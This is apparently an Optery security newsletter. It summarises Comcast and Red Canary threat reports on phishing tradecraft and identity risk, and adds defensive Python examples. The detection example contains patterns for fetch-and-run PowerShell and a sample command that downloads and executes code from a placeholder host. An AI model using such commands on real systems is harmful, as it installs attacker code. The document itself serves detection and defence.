
Threat Reports from Comcast and Red Canary Highlight Recurring and Emerging Phishing Tradecraft

Last Modified Date: Dec 19, 2025


The Optery Dispatch

Welcome to The Optery Dispatch — a newsletter delivering the latest insights on threat intelligence and proactive cybersecurity strategy. In Issue #6, published October 31, 2025, we cover:

  • Comcast Business 2025 Cybersecurity Threat Report: AI-driven phishing, drive-by compromise, and residential proxy abuse highlight the need for multi-layered, adaptive security that combines prevention and detection.

  • Red Canary’s latest Threat Detection Report shows a sharp rise in identity-related detections alongside both recurring and emerging phishing tradecraft designed to evade users and defenses.

  • Cybersecurity Awareness Month 2025: Strong passwords, MFA, scam awareness, and software updates are essential, but must be bolstered with personal data removal.

Comcast Business 2025 Cybersecurity Threat Report

Strained defenders face AI-driven phishing, drive-by compromise, and residential proxy abuse, among other threats.

Comcast Business’s newly released Cybersecurity Threat Report offers one of the most comprehensive pictures yet of how enterprise threats evolved over the past year. Drawing from 34.6 billion cybersecurity events detected between June 2024 and May 2025, Comcast finds that attackers are accelerating in both volume and sophistication, weaponizing AI, exploiting human trust, and using stealthier techniques to evade traditional defenses.

The report identifies AI-driven phishing and social engineering as dominant early-stage threats, with 4.7 billion phishing attempts detected in one year, spanning email, text (smishing), voice (vishing), and even workplace chat tools. Generative AI is being used to craft realistic lures, clone voices, and create deepfake visuals, while overworked employees and security teams remain vulnerable to these convincingly tailored attacks.

“AI tools are only helping increase the realism, speed, and scale of phishing attempts, making this vector more formidable than ever.”

Another key finding is the surge in “drive-by compromise,” nearly 9.7 billion detected attempts, where visiting a compromised or malicious website automatically installs malware or exploit code. These silent infections can steal credentials, deploy infostealers, or open backdoors for later ransomware delivery. While not all drive-by attacks begin with phishing, the report notes that an increasing share are linked to phishing campaigns that funnel targets to these sites. For defenders, it underscores that the path from phishing email, text, or chat to endpoint compromise can now unfold in a single click.

The report also highlights an emerging threat called residential proxy (ResProxy) abuse, in which attackers hijack home and business devices like routers and IoT equipment to disguise malicious traffic. This tactic undermines IP-based trust and enables credential-stuffing and fraud attempts to appear as if they originate from legitimate users.

Comcast observed tens of thousands of “co-opted” consumer and business devices being used as residential proxies to disguise attacker traffic, likely compromised through a mix of vulnerability exploitation, credential-based takeovers, and some voluntary or socially engineered installations of proxy software.

Another prominent theme in the report is the human strain behind defense. With 67% of organizations facing cybersecurity staffing shortages, security teams are overwhelmed by false positives and repetitive alerts. Reducing the overall volume of attacks through preventive measures, like removing exposed personal data that feeds reconnaissance and social engineering, can help ease that pressure, cutting noise at the source so analysts can focus on true threats.

Comcast calls for multi-layered, adaptive security that combines prevention and detection, reinforces security culture, and aligns defenses with business risk. Its recommendations include stronger patch and vulnerability management, phishing-resistant MFA, posture management, AI-driven behavioral analytics, and proactive threat hunting supported by skilled analysts.

Read the full report here: 2025 Comcast Business Cybersecurity Threat Report | Comcast Business

Red Canary’s 2025 Threat Detection Report (Midyear Update)

Red Canary’s latest Threat Detection Report notes “an almost 500 percent increase in detections associated with T1078.004: Cloud Accounts in the first six months of 2025 compared to the entirety of 2024.”

Red Canary explains that these detections largely reflect suspicious or risky cloud logins rather than confirmed compromises. Many are benign or policy violations, such as employees signing into corporate accounts from personal devices or through unsanctioned VPNs. The surge, therefore, represents improved visibility into identity activity and increased risk detection, not necessarily a five-fold rise in intrusions.

For defenders, while identity visibility is improving, this visibility also exposes how intertwined personal and corporate digital identities have become. When legitimate employees frequently log in from unmanaged contexts, the security team sees lots of “unusual” events. 


Attackers may intentionally try to blend inside that noise. Once a personal device is compromised and its stored corporate credentials or browser cookies are stolen, an attacker can use them to access work systems from elsewhere, creating logins that blend in with other unusual, yet legitimate, activity.

Exposed personal data fuels this risk. When attackers know an employee’s name, phone number, or personal email, they can more easily compromise those personal accounts or devices first, then use the stolen credentials or session tokens to authenticate into the company’s environment as that employee.

Phishing findings

Red Canary examined “tens of thousands of user-reported phishing emails” from early 2025. Most reports turned out to be false alarms. Only 16% of the emails users flagged as suspicious were confirmed to be actual phishing attempts.

This means employees are showing vigilance, but are unable to reliably distinguish between legitimate and malicious messages. Of the confirmed phishing cases, 43% were credential phishing, 6% contained malicious attachments, and 51% were ‘generic social engineering.’

Red Canary investigators documented several novel and recurring phishing methods used in 2025:

  • Google Translate masking: Attackers embedded malicious links inside translated webpages, producing legitimate-looking URLs ending in translate[.]goog to disguise the true domain.

  • Vendor-account compromise: Phishing emails sent from actual compromised vendor accounts to partners or clients, appearing trustworthy because they come from legitimate domains with valid context.

  • QR-code and SVG file smuggling: Use of JavaScript and SVG files to hide or assemble malicious payloads after download, bypassing traditional scanners.

  • Paste-and-run / fake CAPTCHA lures: Webpages instructing users to paste PowerShell or cmd commands that install stealer malware or remote-access tools.
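The Google Translate masking item above describes links that end in a translate[.]goog hostname while actually landing somewhere else. The following is an added triage example, not code from Red Canary's report or from Optery: it decodes the proxy hostname back to the real destination and flags any proxied link whose target is outside a trusted-domain list. It assumes the proxy's hostname convention (dots in the target host become single hyphens, original hyphens become double hyphens, and the proxy appends `_x_tr_*` query parameters); the sample links and the trusted-domain set are constructed for the demonstration.

```python
"""Unmask Google Translate proxy links (translate.goog) during phishing triage.

Added example, not from the Red Canary report or from Optery. It assumes the
hostname convention of the translate.goog proxy: the target hostname's dots
become single hyphens and its original hyphens become double hyphens, e.g.
docs.example.com -> docs-example-com.translate.goog. Sample URLs and the
trusted-domain list are constructed for the demonstration.
"""
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse

PROXY_SUFFIX = ".translate.goog"


def decode_proxy_host(label: str) -> str:
    """Reverse the proxy's hostname encoding ('--' = hyphen, '-' = dot)."""
    segments = label.split("--")
    return "-".join(seg.replace("-", ".") for seg in segments)


def unmask_translate_url(url: str) -> dict:
    """Return the target URL hidden behind a translate.goog link.

    Non-proxied URLs are returned unchanged with proxied=False.
    """
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if not host.endswith(PROXY_SUFFIX):
        return {"proxied": False, "url": url, "target_host": host}
    target_host = decode_proxy_host(host[: -len(PROXY_SUFFIX)])
    # Drop the translation control parameters the proxy appends (_x_tr_sl, _x_tr_tl, ...)
    # and keep everything else, so the real landing-page query string survives.
    query = {
        key: values
        for key, values in parse_qs(parsed.query, keep_blank_values=True).items()
        if not key.startswith("_x_tr_")
    }
    rebuilt = urlunparse((
        parsed.scheme, target_host, parsed.path, parsed.params,
        urlencode(query, doseq=True), parsed.fragment,
    ))
    return {"proxied": True, "url": rebuilt, "target_host": target_host}


def in_domain(host: str, domains) -> bool:
    """True when host equals one of the domains or is a subdomain of it."""
    return any(host == d or host.endswith("." + d) for d in domains)


def triage_links(urls, trusted_domains) -> list:
    """Report every proxied link together with its real destination and whether
    that destination is one of the organisation's own domains."""
    findings = []
    for url in urls:
        info = unmask_translate_url(url)
        if not info["proxied"]:
            continue
        findings.append({
            "original": url,
            "unmasked": info["url"],
            "target_host": info["target_host"],
            "trusted_target": in_domain(info["target_host"], trusted_domains),
        })
    return findings


# Constructed sample links as they might appear in a user-reported email.
SAMPLE_LINKS = [
    "https://docs-example-com.translate.goog/login?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&id=7",
    "https://sso-example--corp-net.translate.goog/auth?_x_tr_sl=auto&_x_tr_tl=en",
    "https://docs.example.com/login?id=7",
]
TRUSTED_DOMAINS = {"example.com"}

if __name__ == "__main__":
    for finding in triage_links(SAMPLE_LINKS, TRUSTED_DOMAINS):
        verdict = "known domain" if finding["trusted_target"] else "UNTRUSTED target"
        print(f"{finding['original']}\n  -> {finding['unmasked']} ({verdict})")
```

Running the script prints each proxied link beside its unmasked destination; the second constructed link resolves to a domain outside the trusted set and is the one an analyst would escalate. Because the proxy only rewrites the hostname, the path and the non-`_x_tr_` query string of the real landing page are preserved and can be fed straight into URL reputation or sandbox checks.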

These lure-based campaigns demonstrate that phishing remains the primary delivery mechanism for a range of malicious activity.
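The paste-and-run / fake CAPTCHA item is the one defenders can catch on the endpoint: the user pastes a command into the Run dialog or a console, so the interpreter is spawned by explorer.exe with a command line that fetches and evaluates remote content. Below is an added detection example written for this newsletter, not code from Red Canary's report or from Optery. The event schema, the indicator lists and the three sample events are constructed (the sample uses the reserved `example.invalid` domain, which never resolves); tune the patterns to your EDR's command-line normalisation.

```python
"""Hunt for paste-and-run ("fake CAPTCHA") executions in process-creation telemetry.

Added example, not from the Red Canary report or from Optery. The event schema,
the indicator lists and the sample events are constructed for this demo.
"""
import re
from dataclasses import dataclass

# Interpreters the lures typically tell the user to paste into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# A command typed into the Win+R Run dialog is spawned by explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Remote-fetch / dynamic-evaluation keywords.
FETCH_RE = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|iex|invoke-expression|curl|wget)\b"
    r"|https?://",
    re.IGNORECASE,
)
# Window-hiding, encoding and execution-policy switches.
EVASION_RE = re.compile(
    r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|e(?:nc|ncodedcommand)?\s|nop\b|noprofile\b"
    r"|ep\s+bypass|executionpolicy\s+bypass)",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    cmdline: str


def _basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def score_event(ev: ProcessEvent) -> dict:
    """Return a verdict for one process-creation event with the reasons behind it."""
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    reasons = []
    if image not in INTERPRETERS:
        return {"host": ev.host, "user": ev.user, "suspicious": False, "reasons": reasons}
    interactive = parent in INTERACTIVE_PARENTS
    if interactive:
        reasons.append(f"{image} spawned by {parent} (Run dialog / pasted command)")
    if FETCH_RE.search(ev.cmdline):
        reasons.append("command line fetches or evaluates remote content")
    if EVASION_RE.search(ev.cmdline):
        reasons.append("hidden-window, encoded or policy-bypass switch")
    # Admins and build scripts use these switches legitimately; require the
    # interactive parent plus at least one content indicator before alerting.
    suspicious = interactive and len(reasons) >= 2
    return {"host": ev.host, "user": ev.user, "suspicious": suspicious, "reasons": reasons}


def hunt(events) -> list:
    """Return only the events worth an analyst's attention."""
    return [v for v in (score_event(e) for e in events) if v["suspicious"]]


# Constructed sample telemetry (example.invalid is a reserved, non-resolving domain).
SAMPLE_EVENTS = [
    ProcessEvent("ws-041", "jdoe", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "irm https://example.invalid/verify | iex"'),
    ProcessEvent("ws-041", "jdoe", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\cmd.exe", "cmd /c ipconfig /all"),
    ProcessEvent("build-02", "svc_ci", r"C:\Program Files\Git\git-bash.exe",
                 r"C:\Program Files\PowerShell\7\pwsh.exe", "pwsh -NoProfile -File build.ps1"),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["host"], hit["user"], "|", "; ".join(hit["reasons"]))
```

Only the first sample fires: the interpreter came from explorer.exe and its command line both hides the window and pulls remote content. The second (a user running ipconfig from the Run dialog) and the third (a CI agent running a script with `-NoProfile`) each trip one indicator but not the combination, which is what keeps the rule from adding to the alert noise the report warns about.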

The report’s findings highlight a need for organizations to cut down the noise that new identity visibility creates and to strengthen protections against targeted phishing attacks. 

To meet this challenge, organizations should:

  1. Deploy phishing-resistant MFA and conditional access. Require strong authentication and restrict sign-ins from unmanaged or unknown devices.

  2. Segregate work and personal identities. Enforce password-manager use and prohibit password reuse across personal and corporate accounts.

  3. Reduce public exposure of employee PII. Remove personal data from data-broker sites to limit the information attackers can use to craft believable lures or compromise employee accounts.
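Steps 1 and 2 above, together with the residential proxy finding from the Comcast report, come down to one policy design point: a sign-in decision must not relax because the source IP looks familiar, since a hijacked home router can make attacker traffic look like a legitimate user's. The following is an added illustration for this newsletter, not code from either report or from Optery. It places a weak IP-trusting policy beside a hardened one that requires a managed device and a phishing-resistant factor; the `SignIn` fields, both policies and the four sample sign-ins are constructed, so map them to your own identity provider's sign-in log fields.

```python
"""Evaluate sign-ins against a conditional-access policy that does not lean on IP trust.

Added example, not from the Comcast or Red Canary reports or from Optery. The
SignIn fields, the two policies and the sample events are constructed.
"""
from collections import Counter
from dataclasses import dataclass

# Factors bound to the origin, which a phishing page cannot relay.
PHISHING_RESISTANT = {"fido2", "webauthn", "passkey", "certificate"}


@dataclass
class SignIn:
    user: str
    device_managed: bool            # enrolled in MDM / reported compliant
    auth_method: str                # "password", "sms_otp", "push", "fido2", ...
    source_ip_allowlisted: bool     # IP on a corporate or "known home" allowlist
    session_reused: bool = False    # constructed signal: token presented from a
                                    # device other than the one it was issued to


def legacy_policy(s: SignIn) -> str:
    """Weak policy: a recognised IP skips MFA entirely. A hijacked home router
    used as a residential proxy satisfies this check."""
    if s.source_ip_allowlisted:
        return "allow"
    return "allow" if s.auth_method != "password" else "step_up"


def hardened_policy(s: SignIn) -> dict:
    """Managed device plus phishing-resistant MFA, evaluated regardless of source IP."""
    reasons = []
    if s.session_reused:
        reasons.append("session token replayed from another device")
    if not s.device_managed:
        reasons.append("unmanaged device")
    if s.auth_method not in PHISHING_RESISTANT:
        reasons.append(f"'{s.auth_method}' is not phishing-resistant")

    if s.session_reused or not s.device_managed:
        decision = "block"      # hard requirements, with no IP-based exception
    elif reasons:
        decision = "step_up"    # managed device but weak factor: demand FIDO2/passkey
    else:
        decision = "allow"
    return {"user": s.user, "decision": decision, "reasons": reasons}


def compare(events) -> dict:
    """Count decisions under both policies so the change in noise can be measured."""
    return {
        "legacy": dict(Counter(legacy_policy(e) for e in events)),
        "hardened": dict(Counter(hardened_policy(e)["decision"] for e in events)),
    }


# Constructed sample sign-ins.
SAMPLE_SIGNINS = [
    # Employee on a corporate laptop with a passkey: the only clean case.
    SignIn("alice", device_managed=True, auth_method="passkey", source_ip_allowlisted=True),
    # Employee on a personal phone via an allowlisted IP: legitimate but noisy.
    SignIn("bob", device_managed=False, auth_method="push", source_ip_allowlisted=True),
    # Stolen cookie replayed through a residential proxy on a "trusted" home IP.
    SignIn("carol", device_managed=False, auth_method="password",
           source_ip_allowlisted=True, session_reused=True),
    # Managed laptop but SMS code: step up to a phishing-resistant factor.
    SignIn("dave", device_managed=True, auth_method="sms_otp", source_ip_allowlisted=False),
]

if __name__ == "__main__":
    for s in SAMPLE_SIGNINS:
        print(f"{s.user:6} legacy={legacy_policy(s):8} hardened={hardened_policy(s)['decision']:8}")
    print(compare(SAMPLE_SIGNINS))
```

The legacy policy allows all four sign-ins, including the replayed cookie arriving from a "trusted" home IP. The hardened policy allows only the managed-device passkey sign-in, blocks both unmanaged-device cases at the door (so they never become "unusual but legitimate" events for analysts to triage) and steps up the managed laptop that authenticated with an SMS code.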

Reducing the number of risky personal logins and targeted phishing attempts helps security teams spend less time chasing false positives and more time focusing on genuine threats.

Read the full report here: Threat Detection Report: 2025 Midyear Update | Red Canary

Cybersecurity Awareness Month 2025: Complete Your Defenses With Personal Data Removal

This year’s Cybersecurity Awareness Month highlights the ‘Core 4’ habits: strong passwords, MFA, scam awareness, and software updates. Put another way: protect your passwords, protect your accounts, protect against social engineering, and protect against exploitable vulnerabilities.

One of the most effective ways to reinforce the Core 4 is to address exposed personal data, because attackers rely on it to crack or harvest passwords, bypass MFA, and craft scams that AI now makes more scalable than ever. A data broker profile is an open vulnerability that is just as exploitable as unpatched software.

The less PII you leave exposed to attackers, the fewer opportunities they have, which means a dramatic reduction in targeted social engineering attempts that reach your email or phone. That’s a win for you, your company, and the overburdened security teams working to keep us all secure.

Follow the Core 4 habits to strengthen your passwords, accounts, awareness, and systems. But combine them with personal data removal for more complete proactive protection against today’s most common attack vectors.

Read our full article on this: Cybersecurity Awareness Month 2025: Complete Your Defenses With Personal Data Removal | Optery
